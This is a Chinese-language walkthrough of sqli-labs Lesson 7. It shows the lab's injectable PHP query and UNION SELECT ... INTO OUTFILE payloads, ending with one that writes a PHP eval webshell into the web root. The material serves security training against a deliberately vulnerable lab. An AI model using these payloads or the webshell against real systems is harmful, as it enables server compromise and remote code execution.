Lesson-7 GET - Dump Outfile - string
首先进入欢迎界面。
构造?id=1,结果如图所示。
构造?id=0,结果如图所示。
猜测和上一节一样,执行SQL语句后,如果SQL语句查询到匹配的数据就显示‘You are in.......Use outfile......’。
如果没有查询到匹配数据,就显示‘You have an error in your SQL syntax’。
查看后台源代码,如下:
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font color= "#FFFF00">';
echo 'You are in.... Use outfile......';
echo "<br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
echo 'You have an error in your SQL syntax';
print_r(mysql_error());
echo "</font>";
}
发现,(( ' $id '))的结构。
构造?id=1')) union select 1,2,3 into outfile 'D:/Program Files (x86)/wamp/www/sqli_labs/Less-7/123.txt' --+
结果如图所示。
在浏览器中打开该txt,如图所示。
利用该方法,还可以写入一个Webshell。
?id=1')) union select "<?php @eval($_POST['cmd']);?>",2,3 into outfile 'D:/Program Files (x86)/wamp/www/sqli_labs/Less-7/zzz.php' --+